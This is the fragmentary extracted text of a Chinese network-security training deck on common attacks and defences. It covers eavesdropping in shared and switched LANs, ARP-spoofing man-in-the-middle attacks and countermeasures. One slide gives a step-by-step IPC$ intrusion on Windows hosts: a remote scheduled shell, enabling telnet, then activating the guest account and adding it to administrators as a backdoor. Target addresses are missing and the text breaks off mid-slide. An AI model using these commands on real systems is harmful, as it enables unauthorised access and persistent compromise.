绿盟常见网络攻击与防范-.ppt

绿盟常见网络攻击与防范-
2022/6/6
提纲
常见的网络攻击方法
常用的安全防范措施
常见的网络攻击方法
1980
1985
1990
2019
2000
密码猜测
可自动复制的代码:00，命令成功完成。　4. C:\>at \\ 11:05 （这里设置的时间要比主机时间推后） 5. C:\>net time \\再查查时间到了没有， 的当前时间是 2019/3/19 上午 11:05，那就准备开始下面的命令。　　6. C:\>telnet 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
一次利用ipc$的入侵过程
:\>copy \\\admin$《流光》的Tools目录中　　8. C:\WINNT\system32>ntlm 输入ntlm启动（这里的C:\WINNT\system32>是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务)9. Telnet ，接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组    10. C:\>net user guest /active:yes 11. C:\>net user guest 1234 将Guest的密码改为123412. C:\>net localgroup administrators guest /add 将Guest变为Administrator
网络监听及防范技术
网络窃听是指通过截获他人网络上通信的数据流，并非法从中提取重要信息的一种方法
间接性
利用现有网络协议的一些漏洞来实现，不直接对受害主机系统的整体性进行任何操作或破坏
隐蔽性
网络窃听只对受害主机发出的数据流进行操作，不与主机交换信息，也不影响受害主机的正常通信
网络监听及防范技术 ——共享式局域网下
共享式局域网采用的是广播信道，每一台主机所发出的帧都会被全网内所有主机接收到
一般网卡具有以下四种工作模式：广播模式、多播模式、直接模式和混杂模式
网卡的缺省工作模式是广播模式和直接模式，即只接收发给自己的和广播的帧
网络监听及防范技术 ——共享式局域网下
使用MAC地址来确定数据包的流向
若等于自己的MAC地址或是广播MAC地址，则提交给上层处理程序，否则丢弃此数据
当网卡工作于混杂模式的时候，它不做任何判断，直接将接收到的所有帧提交给上层处理程序
共享式网络下窃听就使用网卡的混杂模式
网络监听及防范技术 ——共享式局域网下
网络监听及防范技术 ——交换式局域网下
在数据链路层，数据帧的目的地址是以网卡的MAC地址来标识
ARP协议实现<IP—MAC>的配对寻址
ARP请求包是以广播的形式发出，正常情况下只有正确IP地址与的主机才会发出ARP响应包，告知查询主机自己的MAC地址。
局域网中每台主机都维护着一张ARP表，其中存放着<IP—MAC>地址对。
网络监听及防范技术 ——交换式局域网下
ARP改向的中间人窃听
A发往B：(MACb，MACa， PROTOCOL，DATA)
B发往A：(MACa，MACb， PROTOCOL，DATA)
A发往B：(MACx，MACa， PROTOCOL，DATA)
B发往A：(MACx，MACb， PROTOCOL，DATA)
网络监听及防范技术 ——交换式局域网下
X分别向A和B发送ARP包，促使其修改ARP表
主机A的ARP表中B为<IPb—MACx>
主机B的ARP表中A为<IPa—MACx>
X成为主机A和主机B之间的“中间人”
网络监听及防范技术 ——网络窃听的被动防范
分割网段
细化网络会使得局域网中被窃听的可能性减小
使用静态ARP表
手工输入<IP—MAC>地址对
采用第三层交换方式
取消局域网对MAC地址、ARP协议的依赖，而采用基于IP地址的交换
加密
SSH、SSL、IPSec
网络监听及防范技术 ——网络窃听的主动防范
共享式局域网下的主动